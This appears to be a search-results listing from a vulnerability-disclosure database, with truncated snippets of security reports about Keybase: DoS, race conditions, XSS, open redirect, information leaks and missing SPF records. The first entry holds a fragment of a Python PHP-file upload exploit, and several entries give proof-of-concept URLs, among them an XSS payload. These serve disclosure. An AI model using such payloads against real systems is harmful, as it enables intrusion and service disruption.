136 matches found
Malware exploit: Keybase
Type: Upload vulnerability Author: Unit42 import requests import sys if lensys.argv != 2: print "Usage: %s phpfile" % file sys.exit1 URL = "" print "Sending request..." multiplefiles = 'file', 'WIN-JJFOIJGL6514222.php', opensys.argv1, 'rb' r = requests.postURL + "image/upload.php",...
Keybase: Denial of Service through set_preference.json
Hey there, When selecting an image at https://keybase.io//api/1.0/image/setpreference.json, passing an invalid value in identitysrc knocks the server down for 20-30 seconds, with just one request. I have verified this by visiting an external website that checks if a website is down. POC: 1. Conne...
Keybase: Register multiple users using one invitation (race condition)
Hi, It is possible to create multiple accounts using a single invitationid due to a race condition bug in //api/1.0/signup.json. I have successfully created 8 accounts using invitation with id = 37c5a121adf23e90b875500d The account usernames: novijosiptest1,2,4,5,6,8,9,10 you can delete them, I...
Keybase: Content spoofing due to the improper behavior of the not-found message
Hey, At dist.keybase.io, it's possible to inject text in the not-found message in order to trick the user into visiting a website or doing something an attacker might be interested in. PoC: https://goo.gl/3WO6iH I've shortened this one because it's really long, it's needed to be on google...
Keybase: Race conditions can be used to bypass invitation limit
Hi, I have received 3 invites from Chris I might have screwed up the PGP email, but thanks anyway, added to my account https://keybase.io/josipfranjkovic. Using race conditions, I was able to send out a total of 7 invites to my throwaway emails, obviously bypassing the 3 invitations limit. Here a...
Keybase: Remote Server Restart Lead to Denial of Service by only one Request.
https://keybase.io//api/1.0/getsalt.json?uid=36965a2dc9bbd814e8558a77040c5419 PoC: set a wrong uid; in this example I change the last number from 9 to 8: https://keybase.io//api/1.0/getsalt.json?uid=36965a2dc9bbd814e8558a77040c5418...
Keybase: Remote Server Restart Lead to Denial of Server by only one Request.
URL: https://keybase.io//api/1.0/merkle/block.json?hash=68b5d3599be9acbe97bcc45603a322f85f8a99b9cbc696592fe1088c3a099a45d929f0bc2fae2230f0b31b5e4b4122365f50b34fcf91a94a357df90a83e3b013 PoC: https://keybase.io//api/1.0/merkle/block.json?hash=1 see video...
keybase.io XSS vulnerability
Vulnerable URL: https://keybase.io//api/1.0/user/lookup.json?usernames=fakeuser1%2cfakeuser2'%22%26%25prompt/XSSPOSED/...
Keybase: Un-handled exception leads to Information Disclosure
Steps: 1. Log in to https://keybase.io/ 2. Click on Me icon from top-right button https://keybase.io/username 3. Click on Edit picture button https://keybase.io/usernameedit-me 4. Intercept the traffic using a proxy tool, e.g. Burp Suite 5. Click on "Prove my Twitter identity" link 6. In the request,...
Keybase: xss
This xss issue only affects content sniffing browsers older versions that don't see the X-Content-Type-Options: nosniff header that you're sending. https://keybase.io//api/1.0/user/lookup.json?usernames=fakeuser1%2cfakeuser2'%22%26%25prompt/XSS/ This returns a page that contains this information:...
Keybase: [keybase.io] Open Redirect
PoC https://keybase.io//www.google.com/%2f%2e%2e HTTP Response: HTTP/1.1 303 See Other ... Location: //www.google.com/%2f%2e%2e/...
Keybase: Sensitive server-side/application information disclosure
There is an Information disclosure vulnerability present in Keybase API request whenever an exception occurs. Steps to reproduce: Open the following URL in any browser - https://keybase.io//api/1.0/user/lookup.json?twitter=john&github=john&usernames=john&usernames=rock Observe that when we add...
Keybase: Full path disclosure at https://keybase.io/_/api/1.0/invitation_request.json
When we send a POST request to https://keybase.io//api/1.0/invitationrequest.json with multiple fullname parameters, for example: [email protected]&fullname=1&fullname=2 we get an error response, which contains information about the server paths and code: TypeError: Object 1,2 has no method...
Keybase: No rate limiting for sensitive actions (like "forgot password") enables user enumeration
Hi there, I noticed a small information leak which allows an attacker to check whether an email address is associated with an account. Steps to reproduce: Send a POST-Request to the url POST //api/1.0/send-reset-pw.json HTTP/1.1 as the following example shows: POST //api/1.0/send-reset-pw.json...
Keybase: SMTP protection not used
Hi I'm checking your website found spf record there. You should apply strict SMTP policy to stop spoofed email sending from your domain. An attacker would send a Fake email from [email protected] saying that Please change your password, The victim is aware of phishing attacks, But when he sees...
Keybase: NO SPF RECORDS
NO SPF RECORDS for keybase.io http://www.kitterman.com/spf/validate.html...